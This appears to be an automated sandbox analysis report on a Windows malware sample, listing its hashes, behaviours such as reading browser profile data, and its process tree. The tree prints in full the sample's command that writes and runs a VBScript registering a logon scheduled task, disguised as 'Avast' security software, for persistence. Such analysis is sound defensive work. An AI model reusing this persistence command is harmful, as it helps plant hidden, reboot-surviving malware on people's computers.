Analysis
-
max time kernel
28s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
17/12/2022, 00:52
Static task
static1
Behavioral task
behavioral1
Sample
3909df10728e9c01e57850894cf7d087.exe
Resource
win7-20221111-en
General
-
Target
3909df10728e9c01e57850894cf7d087.exe
-
Size
74KB
-
MD5
3909df10728e9c01e57850894cf7d087
-
SHA1
9f1d3633974c6e6251507e92e5801456e30f91d1
-
SHA256
2062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014
-
SHA512
9f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d
-
SSDEEP
1536:lefxEVTPl9cOchE2PySGSn95sSb8U5b543npeufE:l3TPLcOcZ78Sb8U5m3nEu8
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1996 AvastSecurity.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1292 3909df10728e9c01e57850894cf7d087.exe 1996 AvastSecurity.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1292 3909df10728e9c01e57850894cf7d087.exe Token: SeDebugPrivilege 1996 AvastSecurity.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1292 wrote to memory of 636 1292 3909df10728e9c01e57850894cf7d087.exe 29 PID 1292 wrote to memory of 636 1292 3909df10728e9c01e57850894cf7d087.exe 29 PID 1292 wrote to memory of 636 1292 3909df10728e9c01e57850894cf7d087.exe 29 PID 636 wrote to memory of 1996 636 cmd.exe 31 PID 636 wrote to memory of 1996 636 cmd.exe 31 PID 636 wrote to memory of 1996 636 cmd.exe 31 PID 1996 wrote to memory of 284 1996 AvastSecurity.exe 32 PID 1996 wrote to memory of 284 1996 AvastSecurity.exe 32 PID 1996 wrote to memory of 284 1996 AvastSecurity.exe 32 PID 284 wrote to memory of 1380 284 cmd.exe 34 PID 284 wrote to memory of 1380 284 cmd.exe 34 PID 284 wrote to memory of 1380 284 cmd.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\3909df10728e9c01e57850894cf7d087.exe"C:\Users\Admin\AppData\Local\Temp\3909df10728e9c01e57850894cf7d087.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exeC:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Avast corporation" : regInfo.Description="Avast security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("AvastSecurity", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:284 -
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs"5⤵PID:1380
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d8655cf5570dfb2f06add1fafa516343
SHA14bc05ddf1577d6a2c32c60c6acb3901ae22acfe1
SHA256a18cde5c98d72f935711a4f0497c376c3360c15580fcd67dc417e7a6b4efd6ef
SHA5124e1451d95274effb47edb8dd04a569b8eb11df23fc0cc02453d26b14bf05bf20117e40145987b4f3500ae48d6e41788e5e5fe0feff0a60165f9060e5f0a4baf3
-
Filesize
74KB
MD53909df10728e9c01e57850894cf7d087
SHA19f1d3633974c6e6251507e92e5801456e30f91d1
SHA2562062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014
SHA5129f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d
-
Filesize
74KB
MD53909df10728e9c01e57850894cf7d087
SHA19f1d3633974c6e6251507e92e5801456e30f91d1
SHA2562062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014
SHA5129f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d